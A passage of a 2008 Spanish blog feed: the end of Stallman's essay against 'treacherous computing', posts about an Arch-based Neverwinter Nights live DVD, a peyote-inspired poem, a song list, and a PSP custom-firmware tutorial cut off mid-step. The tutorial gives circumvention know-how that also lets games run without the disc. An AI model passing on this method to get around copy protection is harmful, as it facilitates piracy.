unirnos y confrontar la situación como una elección colectiva. &lt;br /&gt; Para mayor información sobre computación traidora, vea &lt;http://www.cl.cam.ac.uk/users/rja14/tcpa-faq.html&gt;. &lt;br /&gt; Bloquear la computación traidora requerirá que se organicen un gran número de ciudadanos. ¡Necesitamos su ayuda!. La Electronic Frontier Foundation (Fundación Frontera Electrónica) y Public Knowledge (Conocimiento Público) están organizando campañas en contra de la computación traidora, así como también el Digital Speech Project (Proyecto Expresión Digital) esponsorizado por la FSF. Por favor, visite estos sitios Web para poder sumarse y apoyar de su trabajo. &lt;br /&gt; También puede ayudar escribiendo a las oficinas de asuntos públicos de Intel, IBM, HP/Compaq, o cualquiera a quien usted le haya comprado una computadora, explicándole que no quiere ser presionado a comprar sistemas de computación "confiable", por lo cual no está de acuerdo en que ellos los produzcan. Esto puede ejercer la presión del poder del consumidor. Si usted hace esto, por favor envíe copias de sus cartas a las organizaciones antes citadas. &lt;br /&gt;Posdatas&lt;br /&gt;El proyecto GNU distribuye GNU Privacy Guard, un programa que implementa cifrado de clave pública y firmas digitales, el cual puede utilizase para enviar mensajes de correo electrónico seguros y privados. Es muy ilustrativo examinar cómo GPG se diferencia de la computación traidora, y ver qué hace a una tan útil y a la otra tan peligrosa. &lt;br /&gt; Cuando alguien usa GPG para enviarle un documento cifrado y usted usa GPG para decodificarlo, el resultado es un documento no cifrado que usted puede leer, reenviar, copiar e inclusive re-cifrar para enviarlo de forma segura a un tercero. Una aplicación de computación traidora lo dejaría leer las palabras en la pantalla, pero no producir un documento no cifrado que pudiera usar de otras formas. GPG, un paquete de software libre, pone las funciones de seguridad a disposición de los usuarios: ellos lo usan. La computación traidora está diseñada para imponer restricciones a los usuarios: ella los usa. &lt;br /&gt;Microsoft presenta a palladium como una medida de seguridad, y proclama que brindará protección contra virus, pero esta afirmación es evidentemente falsa. Una presentación de Microsoft Research en octubre de 2002 estableció que una de las especificaciones de palladium es que los sistemas operativos y aplicaciones existentes seguirán pudiéndose ejecutar, por lo tanto, los virus seguirán siendo capaces de hacer todas las cosas que hacen actualmente. &lt;br /&gt; Cuando Microsoft habla de "seguridad" con relación a palladium, no lo hace con el significado que normalmente asociamos a esa palabra: proteger a su computadora de cosas que usted no desea. Ellos se refieren a proteger su acceso a las copias de datos en su computadora de formas que otros no desean que se realice. Una diapositiva en la presentación enumeraba varios tipos de secretos que palladium podría resguardar, incluyendo "secretos de terceras partes" y "secretos de usuario" -- pero poniendo "secretos de usuario" entre comillas, reconociendo que es un absurdo en el contexto de palladium. &lt;br /&gt; La presentación hizo uso frecuente de otros términos que usualmente asociamos en el contexto de seguridad, tales como "ataque", "código malicioso", "engaño" ("spoofing", en inglés), así como también "confianza". Ninguno de esos términos tiene el significado usual. "Ataque" no significa alguien tratando de dañarlo a usted, sino usted intentando copiar música. "Código malicioso" significa código instalado por usted para hacer algo que otros no desean que su computadora haga. "Engaño" no significa alguien engañándolo, sino usted engañando a palladium. Y así sucesivamente. &lt;br /&gt;Una declaración previa de los desarrolladores de palladium establecía la premisa básica que quien hubiera desarrollado o recolectado información debía tener control total sobre cómo usted la usa. Esto hubiera representado una vuelta revolucionaria de ideas pasadas acerca de éticas y del sistema legal, y creado un sistema de control sin precedentes. Los problemas específicos de esos sistemas no son accidentales; sino que resultan de metas básicas. Es la meta que debemos rechazar. &lt;br /&gt; Copyright © 2002 Richard Stallman. &lt;br /&gt; Está permitida la distribución y copia literal de este artículo completo en cualquier medio, siempre que se preserve esta nota.</description><link>http://okltsmash.blogspot.com/2008/04/computacion-confiable-tc-o-computacion.html</link><author>noreply@blogger.com (LTSmash)</author><thr:total>1</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1939403793017189152.post-2850247480506320699</guid><pubDate>Sun, 30 Mar 2008 21:53:00 +0000</pubDate><atom:updated>2008-03-30T16:04:25.729-06:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">NWN-Live</category><title>NWN/Live Beta I lista</title><description>Saludos a los pocos amigos que leen el blog ya sea desde Blogger o desde les feeds.&lt;br /&gt;&lt;br /&gt;Bue, tal como dice el titulo, la Beta I ya esta lista, y tan solo falta subirla a internet xD, lo cual sera un feo problema pero ya me lidiare con el.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight:bold;"&gt;Caracteristicas&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&gt; Basada en Arch Linux, usando un kernel stock 2.6.24&lt;br /&gt;&gt; Incluye la ultima version estable de NWN incluyendo las expansiones oficiales y la comunitaria CEPv2&lt;br /&gt;&gt; Tiene instalado el hack para que use mouse por hardware y no por software&lt;br /&gt;&gt; Soporte para un monton de tarjetas de video, incluyendo el controlador libre RadeonHD y un sistema avanzado de autoconfiguracion automatico&lt;br /&gt;&gt; Kooldock y OpenBox3 para una agradable experiencia de uso&lt;br /&gt;&gt; Thunar y Firefox como utilidades adicionales&lt;br /&gt;&gt; Un nuevo instalador grafico - Archin - que copia el contenido del Live-DVD al disco duro y quita lo que solo sirve para Live-DVD, parte del proyecto Larch&lt;br /&gt;&lt;br /&gt;De momento no esta terminado, es obviamente la primera beta y publica, es por ello que espero nos ayuden con el testeo una vez que la hayan descargado, si les interesa colaborar con el desarrollo o testing solo dejen un mensaje aqui o manden un correo a *lord.ltsmash &lt;at&gt; gmail &lt;dot&gt; com*</description><link>http://okltsmash.blogspot.com/2008/03/nwnlive-beta-i-lista.html</link><author>noreply@blogger.com (LTSmash)</author><thr:total>2</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1939403793017189152.post-9124513324091861137</guid><pubDate>Fri, 21 Mar 2008 21:02:00 +0000</pubDate><atom:updated>2008-03-21T15:09:50.221-06:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">peyote</category><title>Hoy fume peyote</title><description>Esto es lo que pasa cuando fumas peyote, obtienes una "oda al ser critico"&lt;br /&gt;&lt;br /&gt;&lt;blockquote&gt;&lt;span style="font-style:italic;"&gt;Agua, viento, tierra y fuego...&lt;br /&gt;Todo es energía&lt;br /&gt;Gaia, elementos fisicos, elementos virtuales&lt;br /&gt;nadie sabe lo que pasa,&lt;br /&gt;pero todos creen saber.&lt;br /&gt;&lt;br /&gt;Mundo coordinado, mundo controlado&lt;br /&gt;La vida viene y va&lt;br /&gt;dicen los ancianos&lt;br /&gt;Jamás he muerto, jamás moriré&lt;br /&gt;Mi meta: critico ser&lt;br /&gt;&lt;br /&gt;Oye mi oda, escuchala&lt;br /&gt;¿Comprendes que no tiene vida?&lt;br /&gt;Mirate, observate&lt;br /&gt;¿Entiendes que muerto estás aunque el tiempo siga?&lt;br /&gt;&lt;br /&gt;Muchos dicen saber,&lt;br /&gt;hablan, explican y no callan;&lt;br /&gt;yo digo que la gracia está en el ser&lt;br /&gt;La vida sigue pero muerto te hallas&lt;br /&gt;¿Que es la vida si no la puedes entender?&lt;br /&gt;&lt;br /&gt;Llaman tonto al sabio,&lt;br /&gt;necio al observador,&lt;br /&gt;rebelde al liberal,&lt;br /&gt;¿Como te llamas a tí?&lt;br /&gt;Al fin que vivo no estás.&lt;br /&gt;&lt;br /&gt;Que muera la espontaneidad,&lt;br /&gt;Que muera el saber,&lt;br /&gt;A ti no te interesa conocer,&lt;br /&gt;al fin que solo quieres placer.&lt;br /&gt;Una gota mas en el mar.&lt;br /&gt;&lt;br /&gt;¿Como podemos afirmar algo sin conocerlo?&lt;br /&gt;¿Como defendemos algo sin entenderlo?&lt;br /&gt;¿Como aceptamos una verdad por obvia sin argumentos?&lt;br /&gt;Eso es la vida del cualquiera,&lt;br /&gt;y la muerte del ser, entiendelo...&lt;/span&gt;&lt;/blockquote&gt;&lt;br /&gt;&lt;br /&gt;olvide que les doy permiso de usar esta obra (xD) bajo la licencia Creative Commons-Share Alike :p</description><link>http://okltsmash.blogspot.com/2008/03/hoy-fume-peyote.html</link><author>noreply@blogger.com (LTSmash)</author><thr:total>1</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1939403793017189152.post-5733608871848937524</guid><pubDate>Sun, 16 Mar 2008 23:19:00 +0000</pubDate><atom:updated>2008-03-16T17:20:48.803-06:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">musica rock metal</category><title>Las mejores 50 canciones segun yo</title><description>Pues sí, el ocio mueve xD. Aqui las mejores canciones según yo, en realidad el orden no importa:&lt;br /&gt;&lt;br /&gt;Black Diamond - Stratovarius&lt;br /&gt;Soul Of a vagabond - Stratovarius&lt;br /&gt;Phantom of the Opera - Iron Maiden&lt;br /&gt;The Trooper - Iron Maiden&lt;br /&gt;Wishmaster - Nightwish&lt;br /&gt;Rebirth - Angra&lt;br /&gt;I Want out - Helloween&lt;br /&gt;the King For 1000 Years - Helloween&lt;br /&gt;Hocus Pocus - Helloween&lt;br /&gt;One - Metallica&lt;br /&gt;Master Of Puppets - Metallica&lt;br /&gt;Phantom of the Opera - Nightwish&lt;br /&gt;Downfall - Children of Bodom&lt;br /&gt;Cold - Crossfade&lt;br /&gt;Fury of the Storm - Dragonforce&lt;br /&gt;You know my name - Chris Cornell&lt;br /&gt;Like a Stone - Audioslave&lt;br /&gt;With Arms Wide Open - Creed&lt;br /&gt;My Sacrifice - Creed&lt;br /&gt;Blood Bound - Hammerfall&lt;br /&gt;Power - Helloween&lt;br /&gt;Mrs. God - Helloween&lt;br /&gt;As Long As I Fall - Helloween&lt;br /&gt;Eagleheart - Stratovarius&lt;br /&gt;Speed Of light - Stratovarius&lt;br /&gt;Sleep Well - Kotipelto&lt;br /&gt;Lithium - Nirvana&lt;br /&gt;Come As You Are - Nirvana&lt;br /&gt;Seven Days to the Wolves - Nightwish&lt;br /&gt;Phantom of the Opera - Nightwish&lt;br /&gt;Wish I had an Angel - Nightwish&lt;br /&gt;The Poet and the Pendulum - Nightwish&lt;br /&gt;Engel - Rammstein&lt;br /&gt;Seemann - Rammstein&lt;br /&gt;Rock you like a Hurricane - Scorpions&lt;br /&gt;You Only Live Once - the Strokes&lt;br /&gt;Fortune Faded - RHCP&lt;br /&gt;Californication - RHCP&lt;br /&gt;Carry On - Angra&lt;br /&gt;Acid Rain - Angra&lt;br /&gt;Speed of Sound - Coldplay&lt;br /&gt;La Planta - Caos&lt;br /&gt;Cold Winter Nights - Stratovarius&lt;br /&gt;Somewhere Only We Know - Keane&lt;br /&gt;Chop Suey - System of a Down&lt;br /&gt;Elevation - U2&lt;br /&gt;Drowning - Crazy Town&lt;br /&gt;Jaded - Aerosmith&lt;br /&gt;Bring me to Life - Evanescence&lt;br /&gt;Supermassive Black Hole - Muse&lt;br /&gt;&lt;br /&gt;Opinen xD</description><link>http://okltsmash.blogspot.com/2008/03/las-mejores-50-canciones-segun-yo.html</link><author>noreply@blogger.com (LTSmash)</author><thr:total>0</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1939403793017189152.post-8707747318055612627</guid><pubDate>Sun, 24 Feb 2008 21:23:00 +0000</pubDate><atom:updated>2008-02-24T15:38:04.329-06:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">NWN-Live</category><title>NWN-Live, un DVD no tan común</title><description>Saludos a los pocos amigos lectores (xD), ya se que tenia rato sin publicar pero bueno ya he vuelto.&lt;br /&gt;&lt;br /&gt;Hoy quiero hablarles del proyecto que me entretuvo unas cuantas semanas, se trata de un Live-DVD basado en &lt;span style="font-style: italic;"&gt;Arch Linux&lt;/span&gt; e inspirado en la &lt;span style="font-size:-1;"&gt;&lt;b&gt;live&lt;/b&gt;.&lt;b&gt;linuX&lt;/b&gt;-&lt;b&gt;gamers&lt;/b&gt;.net, &lt;span style="font-size:100%;"&gt;pero con unas miras mas tensas a cumplir una meta:&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;Crear un DVD Vivo para jugar al maravilloso Neverwinter Nights con sus expansiones bajo GNU/Linux&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;br /&gt;Este Live-DVD ya esta empaquetado como un pre-Alpha cerrado, sin embargo publicaré la primera Alpha la siguiente semana si me es posible subirla (pesa 3.0GB).&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;br /&gt;Como características tiene:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;- Un sistema básico de autodetección de hardware de vídeo y configuración ya sea automática/manual de X.org.&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;- El ultimo software disponible bajo Arch Linux.&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;- X.org + Un montón de modulos de video (incluido Nvidia en futuras versiones) + Openbox.&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;- Navegador web (Firefox) por si acaso.&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;- Red preconfigurada para DHCP, con posible configuración manual.&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;- Los controladores Wi-Fi mas comunes&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;- Neverwinter Nights nativo incluyendo las expansiones SoU y HotU + CEPv2&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;- Servidor dedicado para NWN&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:100%;"&gt;Concretaré más información la siguiente semana, informes en lord.ltsmash /&lt;at&gt;/ gmail /&lt;dot&gt;/ com&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;</description><link>http://okltsmash.blogspot.com/2008/02/nwn-live-un-dvd-no-tan-comn.html</link><author>noreply@blogger.com (LTSmash)</author><thr:total>1</thr:total></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-1939403793017189152.post-4604467329946127804</guid><pubDate>Tue, 22 Jan 2008 23:40:00 +0000</pubDate><atom:updated>2008-01-22T18:20:17.041-06:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">psp linux ultrapandora installer pandora magic custom firmware</category><title>Cambiando el firmware de nuestra PSP por uno Custom</title><description>Como ustedes quiza saben, Sony NO PERMITE el uso de aplicaciones "homebrew" (es decir, caseras) en nuestros PSP's... entonces, para poder hacer esto ( es decir, poder cargar firmwares e incluso juegos de PSP sin tener el UMD) hay que ponerle un Custom Firmware, lo que nos permite explotar nuestro PSP y hacer muchas cosas geniales con el, pero de esto hablare mas adelante.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:130%;"&gt;&lt;span style="font-weight: bold;"&gt;Montando nuestra PSP en Linux&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:100%;"&gt;&lt;span style="font-weight: bold;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;&lt;/span&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;En el raro caso de que al conectar nuestro PSP y ponerlo en modo USB no se monte automáticamente, o que de algún error raro, lo que haremos es agregarlo a nuestro FSTAB para poderlo montar con facilidad. Ademas, hay que configurarlo de todas formas ya que usa nombres de archivo del tipo WIndows 95 y si le ponemos de otro podría malfuncionar.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Suponiendo que nuestra PSP está en /dev/sdc1, añadiremos la siguiente línea al FSTAB:&lt;br /&gt;&lt;br /&gt;&lt;pre style="font-style: italic;"&gt;/dev/sdc1 /mnt/psp vfat shortname=win95,check=s,rw,user,noauto 0 0&lt;/pre&gt;&lt;br /&gt;De está forma solo tendremos que usar el comando "mount /mnt/psp" cada vez que queramos acceder a la Memory Stick, no olviden crear el directorio /mnt/psp , por favor -.-&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://beta.pesepe.com/biblioarchivosdrupal/fm_publicos/active/12/ultrapandorainstallermini.jpg"&gt;&lt;img style="margin: 0px auto 10px; display: block; text-align: center; cursor: pointer; width: 161px; height: 89px;" src="http://beta.pesepe.com/biblioarchivosdrupal/fm_publicos/active/12/ultrapandorainstallermini.jpg" alt="" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;Tengo el placer de anunciarles, que NO, No y NO vamos a usar Mierdows de ninguna manera xD...&lt;br /&gt;Esta aplicación se llama "UltraPandora Installer", y tiene las siguientes funciones:&lt;br /&gt;&lt;br /&gt;&lt;h2&gt;Funciones&lt;/h2&gt; &lt;ul&gt;&lt;li&gt;Permite Formatear Memory Stick  &lt;/li&gt;&lt;li&gt;Extraccion de Archivos Update 1.50 y MsIpl.Bin  &lt;/li&gt;&lt;li&gt;Instalacion de MsIpl en la Memory Stick (Opcional para usuarios con &lt;a href="http://beta.pesepe.com/story/psp-ms-multiloader-ipl"&gt;Ms_Multi_Loader&lt;/a&gt;) &lt;/li&gt;&lt;li&gt;Instalacion del Despertar del Cementerio v3 o v4&lt;/li&gt;&lt;li&gt;Pandorizar Bateria  &lt;/li&gt;&lt;li&gt;Normalizar Bateria &lt;/li&gt;&lt;/ul&gt;De momento, nos enfocaremos en usar la versión 2.0 ya que nos instala el ultimo Custom Firmware 3.80 M33-5&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;span style="font-size:180%;"&gt;&lt;span style="font-weight: bold;"&gt;TUTORIAL DE USO&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;Antes que nada, nos descargamos aca la aplicación:&lt;br /&gt;&lt;br /&gt;&lt;a href="http://download114.mediafire.com/tgtf44xmmnfg/cxbmimwyn2e/Ultra+_Pandora_Installer_v2.rar"&gt;Descarga UltraPandora Installer v2.0&lt;/a&gt;&lt;br /&gt;&lt;h2 style="text-align: left;"&gt;Requisitos:&lt;/h2&gt;&lt;ul&gt;&lt;li&gt;Una &lt;b&gt;bateria original de Sony de la PSP "normal" o Slim&lt;/b&gt; (&lt;b&gt;usuarios reportan que no se pueden usar las no originales&lt;/b&gt;, aunque os adjuntamos mas abajo una lista de compatibilidad) que sera recuperable. &lt;u&gt;La bateria de la PSP "normal" puede insertarse en la PSP "normal" y en la PSP Slim. &lt;b&gt;La bateria de la PSP Slim solo puede insertarse en la PSP Slim&lt;/b&gt;&lt;/u&gt;.&lt;/li&gt;&lt;li&gt;Una &lt;b&gt;Memory Stick PRO DUO&lt;/b&gt; de al menos 256Mb (&lt;b&gt;se recomienda encarecidamente que sea menor a 4Gb&lt;/b&gt;, puesto que algunos usuarios reportan que la de 4Gb no sirve, &lt;u&gt;&lt;b&gt;no sirven las Memory Sticks de 32Mb&lt;/b&gt;&lt;/u&gt;). Esta Memory Stick es completamente recuperable.&lt;/li&gt;&lt;li&gt;Una PSP brickeada (no arranca) o con un Firmware oficial de Sony (para hackearla). &lt;b&gt;Da igual el tipo de placa, da igual el tipo de Firmware&lt;/b&gt;.&lt;/li&gt;&lt;li&gt;&lt;b&gt;Una PSP "sana" "normal" o Slim (&lt;u&gt;la necesitareis OBLIGATORIAMENTE&lt;/u&gt;&lt;/b&gt;) con el &lt;b&gt;Custom Firmware SE, OE o M33 instalado&lt;/b&gt;. Con ella convertiremos una bateria normal en una Pandora's Battery (JigKick). &lt;u&gt;Esta PSP no corre ningun riesgo&lt;/u&gt;.&lt;/li&gt;&lt;li&gt;En el &lt;b&gt;Menú Recovery&lt;/b&gt; de la PSP "sana", dentro de "&lt;b&gt;Configuration&lt;/b&gt;", pondremos como "&lt;b&gt;Game folder homebrew&lt;/b&gt;" el kernel superior (2.71, 3.40, 3.71, etc...). Este paso no es necesario en PSP Slim (no existe tal opcion). &lt;/li&gt;&lt;li&gt;Los archivos de descarga (en cada paso se especifica lo que necesitais).&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;En resumen:&lt;/p&gt;&lt;ul&gt;&lt;li&gt;Si vamos a hackear un Firmware Original o reparar la flash a una &lt;u&gt;Slim&lt;/u&gt;, &lt;u&gt;&lt;b&gt;necesitaremos una PSP "normal" o PSP Slim con CF ya instalado y la batería de la PSP "normal" o Slim&lt;/b&gt;&lt;/u&gt;. &lt;u&gt;Sirve la bateria de la PSP Slim&lt;/u&gt;.&lt;/li&gt;&lt;li&gt;Si vamos a hackear un Firmware Original o reparar la flash a una &lt;u&gt;Fat&lt;/u&gt;, &lt;u&gt;&lt;b&gt;necesitaremos una PSP "normal" o PSP Slim con CF ya instalado y la batería de la PSP "normal"&lt;/b&gt;&lt;/u&gt;. &lt;u&gt;No sirve la bateria de la PSP Slim&lt;/u&gt;.&lt;/li&gt;&lt;/ul&gt;&lt;h2&gt;&lt;b&gt;Notas&lt;/b&gt;&lt;/h2&gt;&lt;ul&gt;&lt;li&gt;En resumen, &lt;b&gt;necesitamos la bateria de la PSP, ya sea para meterla en una PSP que ya tenga Custom Firmware instalado. Crearemos la Stick "magica", y transformamos la bateria&lt;/b&gt;.&lt;/li&gt;&lt;li&gt;La bateria que modifiquemos no podra usarse como bateria normal a no ser que revirtamos el proceso, lo cual es posible usando este mismo software, se explica mas abajo. &lt;b&gt;Se recomienda que la bateria que useis en este proceso tenga al menos un 75% de bateria&lt;/b&gt;, si esta llena, mucho mejor. Al final del tutorial se explica como cargar una bateria Pandora.&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;Cuando metamos la bateria que hemos modificado y la Memory Stick con los archivos necesarios en la PSP objetivo, arrancara automaticamente, y nos aparecera un menu con varias opciones, entre ellas, la de &lt;b&gt;instalar el Custom Firmware 3.71 M33-2 en nuestra PSP, da igual el Firmware que tengamos (teoricamente sirve también para los Firmwares que aparezcan en el futuro), da igual que la PSP ni siquiera arranque por tener la Flash dañada&lt;/b&gt;.&lt;/p&gt;&lt;h3&gt;Listado de baterias compatibles (segun &lt;a href="http://forums.maxconsole.net/showthread.php?t=75986" target="_blank"&gt;MaxConsole&lt;/a&gt;) &lt;/h3&gt;&lt;ul&gt;&lt;li&gt;&lt;b&gt;Funcionan&lt;/b&gt; &lt;ul&gt;&lt;li&gt;Sony's "standard" Li-ion 1800 mAh&lt;/li&gt;&lt;li&gt;Datel, PSP Battery 3600 mAh (X2)&lt;/li&gt;&lt;li&gt;Datel, PSP Battery 1800 Max Power&lt;/li&gt;&lt;li&gt;Datel, PSP Battery GO MAX&lt;/li&gt;&lt;li&gt;Sony PSP-280 2200mAh&lt;/li&gt;&lt;li&gt;Bateria original de PSP Slim&lt;br /&gt;&lt;br /&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;li&gt;&lt;b&gt;No Funcionan&lt;br /&gt;&lt;br /&gt;&lt;/b&gt;&lt;ul&gt;&lt;li&gt;3.6v 3600 mAh Battery Pack (Silver letters) (Model PSP-360) (Fake)&lt;/li&gt;&lt;li&gt;2600 mAh Mega Battery Pack (Fake)&lt;/li&gt;&lt;li&gt;Atomic Battery Pack 3.6V 1800mAh&lt;/li&gt;&lt;li&gt;Sony PSP-280 2200mAh (Fake)&lt;/li&gt;&lt;li&gt;Sony PSP Bloc-Battery pack 3.6v 1800 mAh &lt;/li&gt;&lt;li&gt;Battery 3600mAh, unknown brand, (china made model NK-RH008) (Fake)&lt;/li&gt;&lt;li&gt;Battery Pack, unknown brand, (lithium) 3.6v 3600 mAH (Fake)&lt;/li&gt;&lt;li&gt;Intec 1800 mAh Li-ion&lt;/li&gt;&lt;li&gt;Intec 2200 mAh&lt;/li&gt;&lt;li&gt;UltraLast e-Boost 3.7v 2200mAh Li-PO battery&lt;br /&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;/ul&gt;&lt;br /&gt;&lt;ul&gt;&lt;li&gt;&lt;ul&gt;&lt;li&gt;         &lt;h2&gt;Empezando&lt;/h2&gt; &lt;p&gt;Damos por hecho que cumplis los &lt;b&gt;requisitos&lt;/b&gt; arriba expuestos. &lt;b&gt;Cogemos "PSP sana" &lt;u&gt;que tiene ya Custom Firmware instalado&lt;/u&gt;&lt;/b&gt;, la Memory Stick, y la bateria de la PSP que vamos a modificar.&lt;/p&gt;&lt;h3&gt;Preparando la Memory Stick &lt;/h3&gt;&lt;p&gt;Conectamos la PSP al USB del PC, con la Memory Stick de al menos 256Mb dentro. &lt;b&gt;Si teneis datos importantes en la Stick, salvadlos al PC lo primero&lt;/b&gt;, pues la vamos a formatear.&lt;/p&gt;&lt;p&gt;&lt;b&gt;Formateamos la Stick&lt;/b&gt; desde el menu Ajustes/Formatear Memory Stick. &lt;/p&gt;&lt;p&gt;Copiamos a la raiz Memory Stick el contenido del UltraPandora Installer que descargamos con anterioridad.&lt;br /&gt;&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt;&lt;p&gt;&lt;b&gt;Recordamos que este paso debemos hacerlo usando una PSP ya "hackeada"&lt;/b&gt;. No podeis usar la PSP con firmware oficial.&lt;/p&gt;&lt;p&gt;Ejecutamos desde el menu juegos el &lt;b&gt;UltraPandora Installer&lt;/b&gt;, y nos aparecera este menu:&lt;/p&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://beta.pesepe.com/biblioarchivosdrupal/fm_publicos/active/12/01formatearstick.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; width: 320px; cursor: pointer; text-align: center;" alt="" src="http://beta.pesepe.com/biblioarchivosdrupal/fm_publicos/active/12/01formatearstick.png" border="0" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;p&gt;&lt;b&gt;Pulsamos X&lt;/b&gt; para borrar el contenido de la Memory Stick. Esto hace un formateo logico de la Memory Stick. El programa sale automaticamente.&lt;/p&gt;&lt;p&gt;Enchuchufamos el USB:&lt;/p&gt;&lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://beta.pesepe.com/biblioarchivosdrupal/fm_publicos/active/8/CapturaSnowman.JPG"&gt;&lt;img style="margin: 0px auto 10px; display: block; width: 320px; cursor: pointer; text-align: center;" alt="" src="http://beta.pesepe.com/biblioarchivosdrupal/fm_publicos/active/8/CapturaSnowman.JPG" border="0" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;p&gt;Copiamos a la raiz Memory Stick lo siguiente (si, &lt;b&gt;copiamos OTRA VEZ el UltraPandora Installer&lt;/b&gt;):&lt;/p&gt;&lt;/li&gt;&lt;/ul&gt; &lt;p&gt;Copiamos a la raíz Memory Stick los Updates de 1.50, 3.40 y 3.71 oficiales de Sony, renombrados a 150.pbp, 340.pbp y 371 pbp respectivamente. Los podéis descargar &lt;a href="http://files.filefront.com/UpdatesDespertarCementeriorar/;9366233;/fileinfo.html"&gt;&lt;b&gt;ya renombrados y preparados para copiar directamente en la Memory Stick&lt;/b&gt;&lt;/a&gt;&lt;a href="http://files.filefront.com/UpdatesDespertarCementeriorar/;9366233;/fileinfo.html"&gt; &lt;/a&gt;.&lt;/p&gt; &lt;p&gt;Sacamos la Memory Stick, y damos a Circulo para cerrar la conexion USB.&lt;br /&gt;&lt;/p&gt; &lt;h3&gt;Creando los archivos necesarios en la Stick &lt;/h3&gt; &lt;p&gt;Os recordamos que estos pasos los estamos realizando con la PSP "sana", que tiene &lt;b&gt;Custom Firmware instalado&lt;/b&gt;. Con ella conseguireis las herramientas para pasar a 3.71 M33-2 la "otra" PSP, o reparar el brick. &lt;b&gt;No podreis realizar estos pasos con la PSP que quereis hackear, necesitais otra PSP.&lt;/b&gt;&lt;/p&gt; &lt;p&gt;Volvemos a introducir la Memory Stick en la PSP y ejecutamos desde el menu Juegos el "&lt;b&gt;UltraPandora Installer&lt;/b&gt;". Vamos a la opcion:&lt;/p&gt; &lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://beta.pesepe.com/biblioarchivosdrupal/fm_publicos/active/12/instalardespertardelcementerio.png"&gt;&lt;img style="margin: 0px auto 10px; display: block; width: 320px; cursor: pointer; text-align: center;" alt="" src="http://beta.pesepe.com/biblioarchivosdrupal/fm_publicos/active/12/instalardespertardelcementerio.png" border="0" /&gt;&lt;/a&gt;&lt;/div&gt; &lt;p&gt;Y le damos a X. &lt;b&gt;Salimos del UltraPandora Installer&lt;/b&gt; (a la derecha del todo esta la opcion de salir) y &lt;b&gt;ejecutamos desde el menu juegos el "Despertar Del Cementerio"&lt;/b&gt;. Damos a X. Esto nos crea en la raiz de la Memory Stick archivos necesarios, asi como el msipl.bin.&lt;/p&gt; &lt;h5&gt;Nota: Si aparece el mensaje "this progam requires 2.71 or higher", asrguraos de que en el Menú Recovery/Configuration tenéis puesto el Kernel Superior (no 1.50) &lt;/h5&gt; &lt;h5&gt;Nota: Si aparece un mensaje con lagun error sobre algun .PBP, es que no tenéis instalado en la raíz el Update correspondiente y/o debidamente renombrado. &lt;/h5&gt; &lt;h5&gt;Nota: Si en este paso la PSP te devuelve un error, asegurate de que tu PSP tiene un Custom Firmware instalado.&lt;/h5&gt; &lt;h5&gt;Nota: Si os aparece el mensaje " error reading system.dreg" Formatead la Flash1 con la aplicación &lt;a href="http://beta.pesepe.com/story/format-flash-1"&gt;Format Flash1&lt;/a&gt;.&lt;br /&gt;&lt;/h5&gt; &lt;p&gt;Una vez realizado este proceso, podemos eliminar los archivos 150.pbp y 340.pbp. No serán necesarios para reparar ni hackear ninguna PSP. &lt;/p&gt; &lt;p&gt;Ejecutamos desde el menu juegos el &lt;b&gt;UltraPandora Installer&lt;/b&gt;, y vamos a la opcion:&lt;/p&gt; &lt;div style="text-align: center;"&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" 